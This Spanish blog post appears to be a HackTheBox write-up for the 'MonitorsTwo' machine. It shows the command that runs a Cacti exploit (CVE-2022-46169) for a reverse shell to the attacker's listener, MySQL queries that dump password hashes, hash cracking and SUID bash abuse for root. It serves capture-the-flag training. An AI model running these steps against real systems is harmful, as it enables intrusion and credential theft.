+++
author = "Daf3r"
title = "🖥️ 🌵  MonitorsTwo HTB - Easy Machine"
date = "2023-06-21"
description = "Un articulo mostrando como vulnerar la maquina MonitorsTwo en HackTheBox"
draft = false
tags = [
    "linux",
    "ciberseguridad",
    "hacking",
    "hacking ético",
]
categories = [
    "Hacking",
    "HackTheBox",
]
series = ["HackTheBox"]
+++

![MonitorsTwo](/images/MonitorsTwo/MonitorsTwo.png)
## IP: 10.10.11.211
Empezamos como siempre haciendo un ping a la maquina para ver si tenemos conexion a ella

![MonitorsTwo](/images/MonitorsTwo/ping.png)

Identificamos a que sistema nos enfrentamos aunque por ver el ttl sabemos que es una linux:

![MonitorsTwo](/images/MonitorsTwo/whichSystem.png)

## Fase de reconocimiento

Entramos en la fase de reconocimiento a hace el respectivo escaneo con nmap:

![MonitorsTwo](/images/MonitorsTwo/nmap.png)

y tenemos que verificar que version y servicio corre para cada uno de esos puertos

![MonitorsTwo](/images/MonitorsTwo/nmap2.png)
## Empezamos a vulnerar la maquina
Vemos que existe el 80 entonces procedemos a verificar que hay corriendo en ese puerto

![MonitorsTwo](/images/MonitorsTwo/cacti.png)

Vemos una pagina web llamada cacti con una version entonces procederemos a buscar que vulnerabilidad existe para esto que hemos encontrado si no proseguimos buscando mas informacion

![MonitorsTwo](/images/MonitorsTwo/exploit.png)


para probar este script en python necesitaremos todo esto:
```
python3 CVE-2022-46169.py -u http://10.10.11.211 --LHOST=10.10.xx.xxx --LPORT=8444
```

> url + NuestraIP + Puerto donde estaremos en escucha con netcat

![MonitorsTwo](/images/MonitorsTwo/cactiexploit.png)

![MonitorsTwo](/images/MonitorsTwo/nc.png)

Ya obteniendo acceso a la maquina procedemos a ver que nos permitira elevar nuestro privilegio ejecutando estos comandos nos hemos convertido en root pero no podemos hacer mucho que se diga

![MonitorsTwo](/images/MonitorsTwo/bash.png)

pero podemos ejecutar lo que esta en raiz que en este caso vemos algo peculiar un archivo “entrypoint.sh”

```bash
#!/bin/bash
set -ex

wait-for-it db:3306 -t 300 -- echo "database is connected"
if [[ ! $(mysql --host=db --user=root --password=root cacti -e "show tables") =~ "automation_devices" ]]; then
    mysql --host=db --user=root --password=root cacti < /var/www/html/cacti.sql
    mysql --host=db --user=root --password=root cacti -e "UPDATE user_auth SET must_change_password='' WHERE username = 'admin'"
    mysql --host=db --user=root --password=root cacti -e "SET GLOBAL time_zone = 'UTC'"
fi

chown www-data:www-data -R /var/www/html
# first arg is `-f` or `--some-option`
if [ "${1#-}" != "$1" ]; then
	set -- apache2-foreground "$@"
fi

exec "$@"
```

Tenemos un usuario para poder acceder como root mysql podemos hacer cositas y explorar que nos puede servir al ejecutar el comando 

```
mysql --host=db --user=root --password=root cacti -e "show tables"
```

Esto nos muestra informacion sobre todas las tablas existentes pero hay una en particular

![MonitorsTwo](/images/MonitorsTwo/sql.png)

Esta tabla puede llegar a tener informacion como usuarios y hashes de password que podemos desencriptar para obtener acceso al sistema asi que ejecutamos:

```
mysql --host=db --user=root --password=root cacti -e "SELECT * FROM user_auth"
```
![MonitorsTwo](/images/MonitorsTwo/sql3.png)

Tenemos el hash de marcus procedemos a tratar de romperlo con john y el diccionario rockyou.txt

![MonitorsTwo](/images/MonitorsTwo/rockyou.png)

Obteniendo esa password ya tenemos acceso mediante ssh:

![MonitorsTwo](/images/MonitorsTwo/ssh.png)

Listamos el contenido y procedemos a leer la primer flag del sistema user.txt

![MonitorsTwo](/images/MonitorsTwo/userflag.png)

Exploramos y el ejecutable exp.sh tiene informacion que puede ser muy interesante para ver que tiene:

![MonitorsTwo](/images/MonitorsTwo/exp.png)

Lo ejecutamos:

![MonitorsTwo](/images/MonitorsTwo/exp2.png)

y nos dice que es vulnerable a esto y nos permite ejecutar una bash sera que podemos hacernos ya de root? Porque si nos fijamos arriba se ejecuto “chmod u+s /bin/bash” lo cual podemos abusar de ese permiso para poder hacernos root 

![MonitorsTwo](/images/MonitorsTwo/docker.png)

Y bien ya somos root solo falta acceder a la raiz para hacernos de la flag root.txt

![MonitorsTwo](/images/MonitorsTwo/rootflag.png)

Y asi se ha resuelto la maquina MonitorsTwo una maquina de dificultad facil.

## PWND la maquina MonitorsTwo

:star: Daf3rTeh Pwnd la maquina MonitorsTwo

![MonitorsTwo](/images/MonitorsTwo/pwnd.png)

https://www.hackthebox.com/achievement/machine/1497957/539
